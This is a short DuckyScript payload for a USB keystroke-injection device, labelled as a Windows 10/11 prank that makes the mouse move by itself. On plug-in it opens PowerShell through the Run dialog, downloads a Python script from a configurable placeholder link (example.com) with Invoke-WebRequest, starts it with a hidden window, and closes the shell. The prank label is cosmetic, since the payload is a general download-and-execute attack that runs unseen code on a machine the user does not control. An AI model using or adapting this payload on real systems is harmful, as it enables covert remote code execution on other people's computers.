REM ############################################
REM #                                          |
REM # Title        : The Mouse Moves By Itself |
REM # Author       : Aleff                     |
REM # Version      : 1.0                       |
REM # Category     : Prank                     |
REM # Target       : Windows 10/11             |
REM #                                          |
REM ############################################


REM Requirements:
REM     - Internet Connection


REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com


DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500

STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 500

STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4
